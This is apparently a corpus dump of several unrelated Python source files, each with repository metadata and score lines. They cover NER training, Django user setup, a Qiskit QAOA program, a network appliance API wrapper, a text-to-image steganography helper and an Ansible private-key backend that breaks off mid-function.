f'ner/trained_ner_models/model_{epoch}.ct') torch.save(optimizer.state_dict(), f'ner/trained_ner_models/optimizer_{epoch}.ct') if len(losses['train']) > 2 and abs(losses['train'][-1] - losses['train'][-2]) < 1e-5: break torch.save(model.state_dict(), f'ner/trained_ner_models/model_{num_epochs}.ct') torch.save(optimizer.state_dict(), f'ner/trained_ner_models/optimizer_{num_epochs}.ct') if save_losses is not None: with open(save_losses, 'wb') as file: pickle.dump(losses, file) if save_metrics is not None: with open(save_metrics, 'wb') as file: pickle.dump(val_metrics, file) return model, optimizer, losses
1.734375
2
scripts/make_users.py
vsoch/CogatPheno
0
12760491
from django.contrib.auth.models import User
from userroles.models import set_user_role
from userroles import roles

# Read in some file with usernames, emails, etc.

username = "tmp"
email = "<EMAIL>"
password = "<PASSWORD>"

user = User.objects.create_user(username, email, password)

# At this point, user is a User object that has already been saved
# to the database. You can continue to change its attributes
# if you want to change other fields.

# Now set user role
set_user_role(user, roles.question_editor)

# roles.question_editor
# roles.assessment_editor
# roles.behavior_editor
1.335938
1
Python/Skrypty/Python - Szkolenie_11-2015/przyklady_rec_python/PythonExample/descriptors2.py
Elzei/show-off
0
12760619
<reponame>Elzei/show-off<gh_stars>0
class MyClass(object):

    @property
    def x(self):
        return self.__x

    @x.getter
    def x(self):
        print "Getting attribute x"
        return self.__x

    @x.setter
    def x(self, value):
        print "Setting x to", value
        self.__x = value

    @x.deleter
    def x(self):
        print "Deleting x"
        del self.__x


a = MyClass()
a.x = 999
w = a.x
del a.x
2.3125
2
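The file above is Python 2; for reference, a minimal Python 3 sketch of the same getter/setter/deleter pattern (the class and attribute names mirror the original and are otherwise arbitrary).

class MyClass:
    @property
    def x(self):
        print("Getting attribute x")
        return self.__x

    @x.setter
    def x(self, value):
        print("Setting x to", value)
        self.__x = value

    @x.deleter
    def x(self):
        print("Deleting x")
        del self.__x


a = MyClass()
a.x = 999    # Setting x to 999
_ = a.x      # Getting attribute x
del a.x      # Deleting x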
lib/modeling/contrasted_context_net.py
xixiobba/MVP-Net
18
12760747
<filename>lib/modeling/contrasted_context_net.py
# Author zhangshu
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable

from core.config import cfg
import nn as mynn
import utils.net as net_utils


def get_cc_net(input_channels, output_channels):
    """ Get an instance of the contrasted_context_net """
    return CCNet(input_channels, output_channels)


class _CCBaseNet(nn.Module):
    def __init__(self):
        super(_CCBaseNet, self).__init__()

    def detectron_weight_mapping(self):
        return {}, []


class CCNet(_CCBaseNet):
    """An implementation of the Contrasted Context layer from CVPR2018 paper.
    Introduced in << Context contrasted feature and gated multi-scale aggregation ...>>
    Params:
        input_channels, output_channels
    """
    def __init__(self, input_channels, output_channels):
        super(CCNet, self).__init__()
        self.conv_local = nn.Conv2d(input_channels, output_channels,
                                    kernel_size=(3, 3), stride=1,
                                    padding=1, bias=False)
        self.conv_context = nn.Conv2d(input_channels, output_channels,
                                      kernel_size=(3, 3), stride=1,
                                      padding=cfg.CONTRASTED_CONTEXT.DILATION_SIZE,
                                      dilation=cfg.CONTRASTED_CONTEXT.DILATION_SIZE,
                                      bias=False)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        local_info = self.conv_local(x)
        context_info = self.conv_context(x)
        return self.relu(local_info - context_info)
1.929688
2
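For context, a self-contained sketch of the same local-minus-dilated-context idea, with the dilation hard-coded instead of read from the repo's cfg; the channel sizes, dilation value, and class name are arbitrary assumptions.

import torch
import torch.nn as nn


class SimpleCCBlock(nn.Module):
    """Local 3x3 conv minus a dilated 3x3 'context' conv, followed by ReLU."""
    def __init__(self, in_ch, out_ch, dilation=4):
        super().__init__()
        self.local = nn.Conv2d(in_ch, out_ch, 3, padding=1, bias=False)
        self.context = nn.Conv2d(in_ch, out_ch, 3, padding=dilation,
                                 dilation=dilation, bias=False)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        return self.relu(self.local(x) - self.context(x))


block = SimpleCCBlock(16, 32)
out = block(torch.randn(1, 16, 64, 64))   # -> torch.Size([1, 32, 64, 64])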
qiskit_optimization/runtime/qaoa_program.py
X-Libor/qiskit-optimization
0
12760875
<gh_stars>0 # This code is part of Qiskit. # # (C) Copyright IBM 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """The Qiskit Optimization QAOA Quantum Program.""" from typing import List, Callable, Optional, Any, Dict, Union import numpy as np from qiskit import QuantumCircuit from qiskit.algorithms import MinimumEigensolverResult from qiskit.circuit.library import QAOAAnsatz from qiskit.opflow import OperatorBase from qiskit.providers import Provider from qiskit.providers.backend import Backend from qiskit_optimization.exceptions import QiskitOptimizationError from .vqe_program import VQEProgram class QAOAProgram(VQEProgram): """The Qiskit Optimization QAOA Quantum Program.""" def __init__( self, optimizer: Optional[Dict[str, Any]] = None, reps: int = 1, initial_state: Optional[QuantumCircuit] = None, mixer: Union[QuantumCircuit, OperatorBase] = None, initial_point: Optional[np.ndarray] = None, provider: Optional[Provider] = None, backend: Optional[Backend] = None, shots: int = 1024, measurement_error_mitigation: bool = False, callback: Optional[Callable[[int, np.ndarray, float, float], None]] = None, store_intermediate: bool = False, ) -> None: """ Args: optimizer: A dictionary specifying a classical optimizer. Currently only SPSA and QN-SPSA are supported. Per default, SPSA is used. The dictionary must contain a key ``name`` for the name of the optimizer and may contain additional keys for the settings. E.g. ``{'name': 'SPSA', 'maxiter': 100}``. reps: the integer parameter :math:`p` as specified in https://arxiv.org/abs/1411.4028, Has a minimum valid value of 1. initial_state: An optional initial state to prepend the QAOA circuit with mixer: the mixer Hamiltonian to evolve with or a custom quantum circuit. Allows support of optimizations in constrained subspaces as per https://arxiv.org/abs/1709.03489 as well as warm-starting the optimization as introduced in http://arxiv.org/abs/2009.10095. initial_point: An optional initial point (i.e. initial parameter values) for the optimizer. If ``None`` a random vector is used. provider: The provider. backend: The backend to run the circuits on. shots: The number of shots to be used measurement_error_mitigation: Whether or not to use measurement error mitigation. callback: a callback that can access the intermediate data during the optimization. Four parameter values are passed to the callback as follows during each evaluation by the optimizer for its current set of parameters as it works towards the minimum. These are: the evaluation count, the optimizer parameters for the ansatz, the evaluated mean and the evaluated standard deviation. store_intermediate: Whether or not to store intermediate values of the optimization steps. Per default False. 
""" super().__init__( ansatz=None, optimizer=optimizer, initial_point=initial_point, provider=provider, backend=backend, shots=shots, measurement_error_mitigation=measurement_error_mitigation, callback=callback, store_intermediate=store_intermediate, ) self._initial_state = initial_state self._mixer = mixer self._reps = reps @property def ansatz(self) -> Optional[QuantumCircuit]: return self._ansatz @ansatz.setter def ansatz(self, ansatz: QuantumCircuit) -> None: raise QiskitOptimizationError( "Cannot set the ansatz for QAOA, it is directly inferred from " "the problem Hamiltonian." ) @property def initial_state(self) -> Optional[QuantumCircuit]: """ Returns: Returns the initial state. """ return self._initial_state @initial_state.setter def initial_state(self, initial_state: Optional[QuantumCircuit]) -> None: """ Args: initial_state: Initial state to set. """ self._initial_state = initial_state @property def mixer(self) -> Union[QuantumCircuit, OperatorBase]: """ Returns: Returns the mixer. """ return self._mixer @mixer.setter def mixer(self, mixer: Union[QuantumCircuit, OperatorBase]) -> None: """ Args: mixer: Mixer to set. """ self._mixer = mixer @property def reps(self) -> int: """ Returns: Returns the reps. """ return self._reps @reps.setter def reps(self, reps: int) -> None: """ Args: reps: The new number of reps. """ self._reps = reps def compute_minimum_eigenvalue( self, operator: OperatorBase, aux_operators: Optional[List[Optional[OperatorBase]]] = None, ) -> MinimumEigensolverResult: self._ansatz = QAOAAnsatz( operator, reps=self.reps, initial_state=self.initial_state, mixer_operator=self.mixer, ) return super().compute_minimum_eigenvalue(operator, aux_operators)
1.554688
2
pyedgeconnect/orch/_link_integrity.py
SPOpenSource/edgeconnect-python
15
12761003
<reponame>SPOpenSource/edgeconnect-python # MIT License # (C) Copyright 2021 Hewlett Packard Enterprise Development LP. # # linkIntegrity : Link integrity and bandwidth test def get_link_integrity_test_result( self, ne_id: str, ) -> dict: """Retrieve current link integrity test status/results from appliance .. list-table:: :header-rows: 1 * - Swagger Section - Method - Endpoint * - linkIntegrity - GET - /linkIntegrityTest/status/{neId} :param ne_id: Appliance id in the format of integer.NE e.g. ``3.NE`` :type ne_id: str :return: Returns dictionary of test status and related results :rtype: dict """ return self._get("/linkIntegrityTest/status/{}".format(ne_id)) def update_user_defined_app_port_protocol( self, ne_pk_1: str, bandwidth_1: str, path_1: str, ne_pk_2: str, bandwidth_2: str, path_2: str, duration: int, test_program: str, dscp: str = "any", ) -> bool: """Start a link integrity test between two appliances using specified parameters .. list-table:: :header-rows: 1 * - Swagger Section - Method - Endpoint * - linkIntegrity - POST - /linkIntegrityTest/run :param ne_pk_1: Network Primary Key (nePk) of first appliance :type ne_pk_1: str :param bandwidth_1: Data transfer rate to use from first appliance :type bandwidth_1: str :param path_1: Traffic path for first appliance. Can have values of "pass-through", "pass-through-unshaped" or "{tunnelID}" e.g. "tunnel_1". :type path_1: str :param ne_pk_2: Network Primary Key (nePk) of second appliance :type ne_pk_2: str :param bandwidth_2: Data transfer rate to use from second appliance :type bandwidth_2: str :param path_2: Traffic path for first appliance. Can have values of "pass-through", "pass-through-unshaped" or "{tunnelID}" e.g. "tunnel_1". :type path_2: str :param duration: Duration of test in seconds :type duration: int :param test_program: Test program to be used for this test. Can have values of "iperf" or "tcpperf" :type test_program: str :param dscp: DSCP value for test traffic, defaults to "any" :type dscp: str, optional :return: Returns True/False based on successful call :rtype: bool """ data = { "appA": {"nePk": ne_pk_1, "bandwidth": bandwidth_1, "path": path_1}, "appB": {"nePk": ne_pk_2, "bandwidth": bandwidth_2, "path": path_2}, "duration": duration, "testProgram": test_program, "DSCP": dscp, } return self._post("/linkIntegrityTest/run", data=data, return_type="bool")
1.546875
2
bpcs/text_to_image.py
BburnN123/bpcs
20
12761131
import re import string from math import sqrt import numpy as np from PIL import Image from .test_utils import show_html_diff def digits_in_base_as_tuple(x, base): """ x is int base is int gets the digits of x in the new base e.g. digits_in_base_as_tuple(20, 2) == (1,0,1,0,0) """ cur = x digs = [] while cur: digs.append(cur % base) cur /= base return tuple(reversed(digs)) def get_word_color_map_fcn(all_words): """ given a set of words, returns a fcn returning an RGB color where each word is maximally spaced out from other word colors """ words = set(all_words) words.add(' ') # add space for padding ncolors = 256**3 ncolors_per_word = ncolors/len(words) word_order = sorted(words) def get_word_color(word): ind = word_order.index(word) assert ind >= 0 colors = digits_in_base_as_tuple(ind*ncolors_per_word, 256) while len(colors) < 3: colors = (0,) + colors assert len(colors) == 3 return colors return get_word_color def list_to_uint8_array(colors, dims): arr = np.array(colors) arr_shaped = np.resize(arr, dims) if arr.size != arr_shaped.size: diff = arr_shaped.size - arr.size print "WARNING: txt will be replicated by {0} chars when printed to image".format(diff) arr_shaped = np.uint8(arr_shaped) return arr_shaped def adjust_words_and_get_dims(words, verbose=False): area = len(words) one_side = sqrt(area) desired_side = (int(one_side)+1) if one_side > int(one_side) else int(one_side) diff = desired_side**2 - area words += [' ']*diff assert len(words) == desired_side**2, desired_side**2 - len(words) if verbose: print 'Adding %s words to end of txt' % (diff,) return words, [desired_side, desired_side, 3] def str_to_words(txt, keep_spaces=False): # if keep_spaces: # # want each space to be its own word # space_first = txt[0] == ' ' # words = str_to_words(txt) # space_chunks = [x for x in re.split('[^ ]', txt) if x] + [' '] # final = [] # for word, space in zip(words, space_chunks): # if space_first: # for i in range(len(space)): # final.append(' ') # final.append(word) # else: # final.append(word) # for i in range(len(space)): # final.append(' ') # return final if keep_spaces: words = str_to_words(txt) spaces = [x for x in re.split('[^ ]', txt) if x] + [' '] return [x for pair in zip(words, spaces) for x in pair] else: return txt.split() # return re.sub('['+string.punctuation+']', '', txt).split() def txt_to_uint8_array_by_word(txt): words = str_to_words(txt, True) words, dims = adjust_words_and_get_dims(words) get_color = get_word_color_map_fcn(words) colors = [get_color(word) for word in words] return list_to_uint8_array(colors, dims) def adjust_txt_and_get_dims(txt, verbose=False): added = 0 # pad with 0s to make divisible by 3 rem = len(txt) % 3 add = 3-rem if rem else 0 txt += ' '*add added += add # pad with 0s to make square area = len(txt)/3 one_side = sqrt(area) desired_side = (int(one_side)+1) if one_side > int(one_side) else int(one_side) diff = 3*(desired_side**2 - area) txt += ' '*diff added += diff assert len(txt) == 3*(desired_side**2), 3*(desired_side**2) - len(txt) if verbose: print 'Adding %s spaces to end of txt' % (added,) return txt, [desired_side, desired_side, 3] def txt_to_uint8_array_by_char(txt): txt, dims = adjust_txt_and_get_dims(txt, True) colors = [ord(x) for x in txt] return list_to_uint8_array(colors, dims) def image_to_txt(imfile, txtfile): """ converts each character to a number assuming the character is ascii and arranges all resulting colors into an array => image note: colors are inserted depth first, meaning e.g. 
if the first word is 'the' then the first pixel will be (ord('t'), ord('h'), ord('e')) 'the' => (116, 104, 101) == #6A6865 """ png = Image.open(imfile).convert('RGB') arr = np.array(png) dims = arr.size arr_flat = np.resize(arr, dims) chars = [chr(x) for x in arr_flat] with open(txtfile, 'w') as f: f.write(''.join(chars)) def txt_to_image(txtfile, imfile, by_char=True): txt = open(txtfile).read() if by_char: arr = txt_to_uint8_array_by_char(txt) else: arr = txt_to_uint8_array_by_word(txt) im = Image.fromarray(arr) im.save(imfile) def test_adjust_txt_and_get_dims(): vals = [5, 10, 11, 19, 24, 25, 31, 32, 269393] sides = [2, 2, 2, 3, 3, 3, 4, 4, 300] for val, side in zip(vals, sides): assert adjust_txt_and_get_dims(' '*val)[1] == [side, side, 3], val def test_invertibility(txtfile): """ roughly, assert txtfile == image_to_txt(txt_to_image(txtfile)) ignoring whitespace before and after txt """ pngfile = txtfile.replace('.txt', '.png') txt_to_image(txtfile, pngfile) new_txtfile = txtfile.replace('.', '_new.') image_to_txt(pngfile, new_txtfile) txt1 = open(txtfile).read().strip() txt2 = open(new_txtfile).read().strip() assert txt1 == txt2, show_html_diff((txt1, 'OG'), (txt2, 'NEW')) def test_all(): txtfile = 'docs/tmp.txt' test_adjust_txt_and_get_dims() test_invertibility(txtfile) if __name__ == '__main__': test_all() by_char = False base_dir = '/Users/mobeets/bpcs-steg/docs/' infiles = ['karenina', 'warandpeace'] infiles = ['tmp', 'tmp1', 'tmp2'] infiles = [base_dir + infile + '.txt' for infile in infiles] outfiles = [base_dir + outfile + '.txt' for outfile in outfiles] for infile,outfile in zip(infiles, outfiles): txt_to_image(infile, outfile, by_char) # infile = '/Users/mobeets/Desktop/tmp2.png' # outfile = '/Users/mobeets/Desktop/tmp2.txt' # image_to_txt(infile, outfile, by_char)
2.84375
3
intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/crypto/plugins/module_utils/crypto/module_backends/privatekey.py
Stienvdh/statrick
0
12761259
<filename>intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/crypto/plugins/module_utils/crypto/module_backends/privatekey.py # -*- coding: utf-8 -*- # # Copyright: (c) 2016, <NAME> <<EMAIL>> # Copyright: (c) 2020, <NAME> <<EMAIL>> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type import abc import base64 import traceback from distutils.version import LooseVersion from ansible.module_utils import six from ansible.module_utils.basic import missing_required_lib from ansible.module_utils._text import to_bytes from ansible_collections.community.crypto.plugins.module_utils.crypto.basic import ( CRYPTOGRAPHY_HAS_X25519, CRYPTOGRAPHY_HAS_X25519_FULL, CRYPTOGRAPHY_HAS_X448, CRYPTOGRAPHY_HAS_ED25519, CRYPTOGRAPHY_HAS_ED448, OpenSSLObjectError, OpenSSLBadPassphraseError, ) from ansible_collections.community.crypto.plugins.module_utils.crypto.support import ( load_privatekey, get_fingerprint_of_privatekey, ) from ansible_collections.community.crypto.plugins.module_utils.crypto.pem import ( identify_private_key_format, ) from ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.common import ArgumentSpec MINIMAL_PYOPENSSL_VERSION = '0.6' MINIMAL_CRYPTOGRAPHY_VERSION = '1.2.3' PYOPENSSL_IMP_ERR = None try: import OpenSSL from OpenSSL import crypto PYOPENSSL_VERSION = LooseVersion(OpenSSL.__version__) except ImportError: PYOPENSSL_IMP_ERR = traceback.format_exc() PYOPENSSL_FOUND = False else: PYOPENSSL_FOUND = True CRYPTOGRAPHY_IMP_ERR = None try: import cryptography import cryptography.exceptions import cryptography.hazmat.backends import cryptography.hazmat.primitives.serialization import cryptography.hazmat.primitives.asymmetric.rsa import cryptography.hazmat.primitives.asymmetric.dsa import cryptography.hazmat.primitives.asymmetric.ec import cryptography.hazmat.primitives.asymmetric.utils CRYPTOGRAPHY_VERSION = LooseVersion(cryptography.__version__) except ImportError: CRYPTOGRAPHY_IMP_ERR = traceback.format_exc() CRYPTOGRAPHY_FOUND = False else: CRYPTOGRAPHY_FOUND = True class PrivateKeyError(OpenSSLObjectError): pass # From the object called `module`, only the following properties are used: # # - module.params[] # - module.warn(msg: str) # - module.fail_json(msg: str, **kwargs) @six.add_metaclass(abc.ABCMeta) class PrivateKeyBackend: def __init__(self, module, backend): self.module = module self.type = module.params['type'] self.size = module.params['size'] self.curve = module.params['curve'] self.passphrase = module.params['passphrase'] self.cipher = module.params['cipher'] self.format = module.params['format'] self.format_mismatch = module.params.get('format_mismatch', 'regenerate') self.regenerate = module.params.get('regenerate', 'full_idempotence') self.backend = backend self.private_key = None self.existing_private_key = None self.existing_private_key_bytes = None @abc.abstractmethod def generate_private_key(self): """(Re-)Generate private key.""" pass def convert_private_key(self): """Convert existing private key (self.existing_private_key) to new private key (self.private_key). This is effectively a copy without active conversion. The conversion is done during load and store; get_private_key_data() uses the destination format to serialize the key. 
""" self._ensure_existing_private_key_loaded() self.private_key = self.existing_private_key @abc.abstractmethod def get_private_key_data(self): """Return bytes for self.private_key.""" pass def set_existing(self, privatekey_bytes): """Set existing private key bytes. None indicates that the key does not exist.""" self.existing_private_key_bytes = privatekey_bytes def has_existing(self): """Query whether an existing private key is/has been there.""" return self.existing_private_key_bytes is not None @abc.abstractmethod def _check_passphrase(self): """Check whether provided passphrase matches, assuming self.existing_private_key_bytes has been populated.""" pass @abc.abstractmethod def _ensure_existing_private_key_loaded(self): """Make sure that self.existing_private_key is populated from self.existing_private_key_bytes.""" pass @abc.abstractmethod def _check_size_and_type(self): """Check whether provided size and type matches, assuming self.existing_private_key has been populated.""" pass @abc.abstractmethod def _check_format(self): """Check whether the key file format, assuming self.existing_private_key and self.existing_private_key_bytes has been populated.""" pass def needs_regeneration(self): """Check whether a regeneration is necessary.""" if self.regenerate == 'always': return True if not self.has_existing(): # key does not exist return True if not self._check_passphrase(): if self.regenerate == 'full_idempotence': return True self.module.fail_json(msg='Unable to read the key. The key is protected with a another passphrase / no passphrase or broken.' ' Will not proceed. To force regeneration, call the module with `generate`' ' set to `full_idempotence` or `always`, or with `force=yes`.') self._ensure_existing_private_key_loaded() if self.regenerate != 'never': if not self._check_size_and_type(): if self.regenerate in ('partial_idempotence', 'full_idempotence'): return True self.module.fail_json(msg='Key has wrong type and/or size.' ' Will not proceed. To force regeneration, call the module with `generate`' ' set to `partial_idempotence`, `full_idempotence` or `always`, or with `force=yes`.') # During generation step, regenerate if format does not match and format_mismatch == 'regenerate' if self.format_mismatch == 'regenerate' and self.regenerate != 'never': if not self._check_format(): if self.regenerate in ('partial_idempotence', 'full_idempotence'): return True self.module.fail_json(msg='Key has wrong format.' ' Will not proceed. To force regeneration, call the module with `generate`' ' set to `partial_idempotence`, `full_idempotence` or `always`, or with `force=yes`.' ' To convert the key, set `format_mismatch` to `convert`.') return False def needs_conversion(self): """Check whether a conversion is necessary. 
Must only be called if needs_regeneration() returned False.""" # During conversion step, convert if format does not match and format_mismatch == 'convert' self._ensure_existing_private_key_loaded() return self.has_existing() and self.format_mismatch == 'convert' and not self._check_format() def _get_fingerprint(self): if self.private_key: return get_fingerprint_of_privatekey(self.private_key, backend=self.backend) try: self._ensure_existing_private_key_loaded() except Exception as dummy: # Ignore errors pass if self.existing_private_key: return get_fingerprint_of_privatekey(self.existing_private_key, backend=self.backend) def dump(self, include_key): """Serialize the object into a dictionary.""" if not self.private_key: try: self._ensure_existing_private_key_loaded() except Exception as dummy: # Ignore errors pass result = { 'type': self.type, 'size': self.size, 'fingerprint': self._get_fingerprint(), } if self.type == 'ECC': result['curve'] = self.curve if include_key: # Get hold of private key bytes pk_bytes = self.existing_private_key_bytes if self.private_key is not None: pk_bytes = self.get_private_key_data() # Store result if pk_bytes: if identify_private_key_format(pk_bytes) == 'raw': result['privatekey'] = base64.b64encode(pk_bytes) else: result['privatekey'] = pk_bytes.decode('utf-8') else: result['privatekey'] = None return result # Implementation with using pyOpenSSL class PrivateKeyPyOpenSSLBackend(PrivateKeyBackend): def __init__(self, module): super(PrivateKeyPyOpenSSLBackend, self).__init__(module=module, backend='pyopenssl') if self.type == 'RSA': self.openssl_type = crypto.TYPE_RSA elif self.type == 'DSA': self.openssl_type = crypto.TYPE_DSA else: self.module.fail_json(msg="PyOpenSSL backend only supports RSA and DSA keys.") if self.format != 'auto_ignore': self.module.fail_json(msg="PyOpenSSL backend only supports auto_ignore format.") def generate_private_key(self): """(Re-)Generate private key.""" self.private_key = crypto.PKey() try: self.private_key.generate_key(self.openssl_type, self.size) except (TypeError, ValueError) as exc: raise PrivateKeyError(exc) def _ensure_existing_private_key_loaded(self): if self.existing_private_key is None and self.has_existing(): try: self.existing_private_key = load_privatekey( None, self.passphrase, content=self.existing_private_key_bytes, backend=self.backend) except OpenSSLBadPassphraseError as exc: raise PrivateKeyError(exc) def get_private_key_data(self): """Return bytes for self.private_key""" if self.cipher and self.passphrase: return crypto.dump_privatekey(crypto.FILETYPE_PEM, self.private_key, self.cipher, to_bytes(self.passphrase)) else: return crypto.dump_privatekey(crypto.FILETYPE_PEM, self.private_key) def _check_passphrase(self): try: load_privatekey(None, self.passphrase, content=self.existing_private_key_bytes, backend=self.backend) return True except Exception as dummy: return False def _check_size_and_type(self): return self.size == self.existing_private_key.bits() and self.openssl_type == self.existing_private_key.type() def _check_format(self): # Not supported by this backend return True # Implementation with using cryptography class PrivateKeyCryptographyBackend(PrivateKeyBackend): def _get_ec_class(self, ectype): ecclass = cryptography.hazmat.primitives.asymmetric.ec.__dict__.get(ectype) if ecclass is None: self.module.fail_json(msg='Your cryptography version does not support {0}'.format(ectype)) return ecclass def _add_curve(self, name, ectype, deprecated=False): def create(size): ecclass = 
self._get_ec_class(ectype) return ecclass() def verify(privatekey): ecclass = self._get_ec_class(ectype) return isinstance(privatekey.private_numbers().public_numbers.curve, ecclass) self.curves[name] = { 'create': create, 'verify': verify, 'deprecated': deprecated, } def __init__(self, module): super(PrivateKeyCryptographyBackend, self).__init__(module=module, backend='cryptography') self.curves = dict() self._add_curve('secp224r1', 'SECP224R1') self._add_curve('secp256k1', 'SECP256K1') self._add_curve('secp256r1', 'SECP256R1') self._add_curve('secp384r1', 'SECP384R1') self._add_curve('secp521r1', 'SECP521R1') self._add_curve('secp192r1', 'SECP192R1', deprecated=True) self._add_curve('sect163k1', 'SECT163K1', deprecated=True) self._add_curve('sect163r2', 'SECT163R2', deprecated=True) self._add_curve('sect233k1', 'SECT233K1', deprecated=True) self._add_curve('sect233r1', 'SECT233R1', deprecated=True) self._add_curve('sect283k1', 'SECT283K1', deprecated=True) self._add_curve('sect283r1', 'SECT283R1', deprecated=True) self._add_curve('sect409k1', 'SECT409K1', deprecated=True) self._add_curve('sect409r1', 'SECT409R1', deprecated=True) self._add_curve('sect571k1', 'SECT571K1', deprecated=True) self._add_curve('sect571r1', 'SECT571R1', deprecated=True) self._add_curve('brainpoolP256r1', 'BrainpoolP256R1', deprecated=True) self._add_curve('brainpoolP384r1', 'BrainpoolP384R1', deprecated=True) self._add_curve('brainpoolP512r1', 'BrainpoolP512R1', deprecated=True) self.cryptography_backend = cryptography.hazmat.backends.default_backend() if not CRYPTOGRAPHY_HAS_X25519 and self.type == 'X25519': self.module.fail_json(msg='Your cryptography version does not support X25519') if not CRYPTOGRAPHY_HAS_X25519_FULL and self.type == 'X25519': self.module.fail_json(msg='Your cryptography version does not support X25519 serialization') if not CRYPTOGRAPHY_HAS_X448 and self.type == 'X448': self.module.fail_json(msg='Your cryptography version does not support X448') if not CRYPTOGRAPHY_HAS_ED25519 and self.type == 'Ed25519': self.module.fail_json(msg='Your cryptography version does not support Ed25519') if not CRYPTOGRAPHY_HAS_ED448 and self.type == 'Ed448': self.module.fail_json(msg='Your cryptography version does not support Ed448') def _get_wanted_format(self): if self.format not in ('auto', 'auto_ignore'): return self.format if self.type in ('X25519', 'X448', 'Ed25519', 'Ed448'): return 'pkcs8' else: return 'pkcs1' def generate_private_key(self): """(Re-)Generate private key.""" try: if self.type == 'RSA': self.private_key = cryptography.hazmat.primitives.asymmetric.rsa.generate_private_key( public_exponent=65537, # OpenSSL always uses this key_size=self.size, backend=self.cryptography_backend ) if self.type == 'DSA': self.private_key = cryptography.hazmat.primitives.asymmetric.dsa.generate_private_key( key_size=self.size, backend=self.cryptography_backend ) if CRYPTOGRAPHY_HAS_X25519_FULL and self.type == 'X25519': self.private_key = cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate() if CRYPTOGRAPHY_HAS_X448 and self.type == 'X448': self.private_key = cryptography.hazmat.primitives.asymmetric.x448.X448PrivateKey.generate() if CRYPTOGRAPHY_HAS_ED25519 and self.type == 'Ed25519': self.private_key = cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey.generate() if CRYPTOGRAPHY_HAS_ED448 and self.type == 'Ed448': self.private_key = cryptography.hazmat.primitives.asymmetric.ed448.Ed448PrivateKey.generate() if self.type == 'ECC' and self.curve in self.curves: if 
self.curves[self.curve]['deprecated']: self.module.warn('Elliptic curves of type {0} should not be used for new keys!'.format(self.curve)) self.private_key = cryptography.hazmat.primitives.asymmetric.ec.generate_private_key( curve=self.curves[self.curve]['create'](self.size), backend=self.cryptography_backend ) except cryptography.exceptions.UnsupportedAlgorithm as dummy: self.module.fail_json(msg='Cryptography backend does not support the algorithm required for {0}'.format(self.type)) def get_private_key_data(self): """Return bytes for self.private_key""" # Select export format and encoding try: export_format = self._get_wanted_format() export_encoding = cryptography.hazmat.primitives.serialization.Encoding.PEM if export_format == 'pkcs1': # "TraditionalOpenSSL" format is PKCS1 export_format = cryptography.hazmat.primitives.serialization.PrivateFormat.TraditionalOpenSSL elif export_format == 'pkcs8': export_format = cryptography.hazmat.primitives.serialization.PrivateFormat.PKCS8 elif export_format == 'raw': export_format = cryptography.hazmat.primitives.serialization.PrivateFormat.Raw export_encoding = cryptography.hazmat.primitives.serialization.Encoding.Raw except AttributeError: self.module.fail_json(msg='Cryptography backend does not support the selected output format "{0}"'.format(self.format)) # Select key encryption encryption_algorithm = cryptography.hazmat.primitives.serialization.NoEncryption() if self.cipher and self.passphrase: if self.cipher == 'auto': encryption_algorithm = cryptography.hazmat.primitives.serialization.BestAvailableEncryption(to_bytes(self.passphrase)) else: self.module.fail_json(msg='Cryptography backend can only use "auto" for cipher option.') # Serialize key try: return self.private_key.private_bytes( encoding=export_encoding, format=export_format, encryption_algorithm=encryption_algorithm ) except ValueError as dummy: self.module.fail_json( msg='Cryptography backend cannot serialize the private key in the required format "{0}"'.format(self.format) ) except Exception as dummy: self.module.fail_json( msg='Error while serializing the private key in the required format "{0}"'.format(self.format), exception=traceback.format_exc() ) def _load_privatekey(self): data = self.existing_private_key_bytes try: # Interpret bytes depending on format. 
format = identify_private_key_format(data) if format == 'raw': if len(data) == 56 and CRYPTOGRAPHY_HAS_X448: return cryptography.hazmat.primitives.asymmetric.x448.X448PrivateKey.from_private_bytes(data) if len(data) == 57 and CRYPTOGRAPHY_HAS_ED448: return cryptography.hazmat.primitives.asymmetric.ed448.Ed448PrivateKey.from_private_bytes(data) if len(data) == 32: if CRYPTOGRAPHY_HAS_X25519 and (self.type == 'X25519' or not CRYPTOGRAPHY_HAS_ED25519): return cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.from_private_bytes(data) if CRYPTOGRAPHY_HAS_ED25519 and (self.type == 'Ed25519' or not CRYPTOGRAPHY_HAS_X25519): return cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey.from_private_bytes(data) if CRYPTOGRAPHY_HAS_X25519 and CRYPTOGRAPHY_HAS_ED25519: try: return cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.from_private_bytes(data) except Exception: return cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey.from_private_bytes(data) raise PrivateKeyError('Cannot load raw key') else: return cryptography.hazmat.primitives.serialization.load_pem_private_key( data, None if self.passphrase is None else to_bytes(self.passphrase), backend=self.cryptography_backend ) except Exception as e: raise PrivateKeyError(e) def _ensure_existing_private_key_loaded(self): if self.existing_private_key is None and self.has_existing(): self.existing_private_key = self._load_privatekey() def _check_passphrase(self): try: format = identify_private_key_format(self.existing_private_key_bytes) if format == 'raw': # Raw keys cannot be encrypted. To avoid incompatibilities, we try to # actually load the key (and return False when this fails). self._load_privatekey() # Loading the key succeeded. Only return True when no passphrase was # provided. 
